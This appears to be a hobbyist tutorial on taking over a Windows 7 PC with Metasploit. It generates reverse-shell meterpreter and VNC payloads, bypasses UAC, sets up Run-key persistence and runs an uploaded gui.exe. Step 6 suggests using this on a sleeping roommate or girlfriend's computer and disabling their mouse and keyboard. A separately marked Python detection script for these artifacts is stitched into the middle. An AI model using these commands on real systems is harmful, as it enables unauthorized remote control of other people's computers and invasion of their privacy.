OTW's great tutorial "Hack Like a Pro: How to Save the World from Nuclear Annihilation" gave me the inspiration to try this on Win7 SP1.
I did this under Bugtraq 2 Black Widow, but it works almost the same on Kali Linux.
Step 1: Start All Services and Run Metasploit
On Bugtraq vncviewer is not preinstalled, so:
# sudo apt-get install vncviewer
Then start the required services:
# sudo service postgresql start
# sudo service metasploit start
# sudo msfconsole
Step 2: We Need Two Payloads
I did this with msfpayload:
First we need the meterpreter:
# msfpayload windows/meterpreter/reverse_tcp LHOST=
Now we have the file backdoor.exe on our desktop. Next we need another .exe file that we will upload to our target and execute through the meterpreter:
# msfpayload windows/vncinject/reverse_tcp LHOST= LPORT=
Step 3: Let's Run the Meterpreter and Bypass the UAC
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit
So we see that the meterpreter is running on our target, but we need more system rights.
meterpreter > getprivs
meterpreter > getsystem
Access Denied!!
That should not be a big problem.
You can look at your privileges with the command
meterpreter > run post/windows/gather/win_privs
meterpreter > background
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST
msf exploit(bypassuac) > set LPORT
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
If that happens, just try again:
msf exploit(bypassuac) > exploit
It works, now:
meterpreter > getsystem
meterpreter > getprivs
Now we should own the system, but we also want VNC on the target.
If you want to make the meterpreter persistent in case something goes wrong, just type
meterpreter > run persistence -A -L c:\\ -X 5 -p
Step 4: Now the Fun Part
The meterpreter has download and upload functions, and they work like this:
meterpreter > upload -r /home/bugtraq/Desktop/gui.exe C:/
Now we open a second Metasploit terminal and type in
msf > use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit
It should now look like this
Step 5: Getting Finished...
Now we go back to our meterpreter terminal; make sure you are in the folder C:/ where the gui.exe file is, and type in
meterpreter > execute -f gui.exe
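Seen from the defender's side, the upload-to-C:/ and execute steps, and the persistence script used earlier (which drops a .vbs in the -L directory and registers a Run key for it), leave easily spotted artifacts: an executable launched from the drive root, wscript running a .vbs from the drive root, and a Run key pointing at such a .vbs. This is an added example, not part of the original post: a small Python scan over constructed, Sysmon-style JSON event lines. The event format, field names and the sample values are assumptions.

```python
import json
import re

# Constructed sample events in a simplified, Sysmon-like JSON-lines form.
# Field names ("event", "image", "cmdline", "key", "value") are assumptions,
# not the real Sysmon schema; values are made up for this example.
SAMPLE_EVENTS = r"""
{"event": "process_create", "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"event": "process_create", "image": "C:\\gui.exe", "cmdline": "C:\\gui.exe"}
{"event": "registry_set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\xYzAbC", "value": "wscript.exe C:\\xYzAbC.vbs"}
{"event": "process_create", "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "wscript.exe C:\\xYzAbC.vbs"}
{"event": "registry_set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "value": "C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"}
"""

# An .exe sitting directly in a drive root (e.g. C:\gui.exe), no subfolder.
DRIVE_ROOT_EXE = re.compile(r"^[A-Za-z]:\\[^\\]+\.exe$", re.IGNORECASE)
# A .vbs sitting directly in a drive root, anywhere in a command line or value.
ROOT_VBS = re.compile(r"[A-Za-z]:\\[^\\]+\.vbs", re.IGNORECASE)
# Autostart location used by the persistence script.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)


def analyze(event_lines):
    """Return a list of (finding, evidence) tuples for suspicious events."""
    findings = []
    for raw in event_lines.strip().splitlines():
        ev = json.loads(raw)
        if ev["event"] == "process_create":
            if DRIVE_ROOT_EXE.match(ev["image"]):
                findings.append(("exe_in_drive_root", ev["image"]))
            if "wscript" in ev["image"].lower() and ROOT_VBS.search(ev["cmdline"]):
                findings.append(("wscript_vbs_in_drive_root", ev["cmdline"]))
        elif ev["event"] == "registry_set":
            if RUN_KEY.search(ev["key"]) and ROOT_VBS.search(ev["value"]):
                findings.append(("run_key_to_drive_root_vbs", ev["key"]))
    return findings


if __name__ == "__main__":
    for kind, evidence in analyze(SAMPLE_EVENTS):
        print(f"{kind}: {evidence}")
```

The legitimate OneDrive Run key and explorer.exe are left alone; only the drive-root executable, the Run key to a drive-root .vbs, and the wscript launch of that .vbs are reported.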
Step 6: MUCH More FUN
Let's say a person (roommate/girlfriend/whatever) is asleep in front of our target PC. If you want to wake him/her in an annoying way, search for his music and have some fun hehe,
meterpreter > uictl disable mouse
meterpreter > uictl disable keyboard
and have fun :D
I am sure there are better ways to do this hack,
but it works; suggestions for improvement are always welcome!
Hope you enjoyed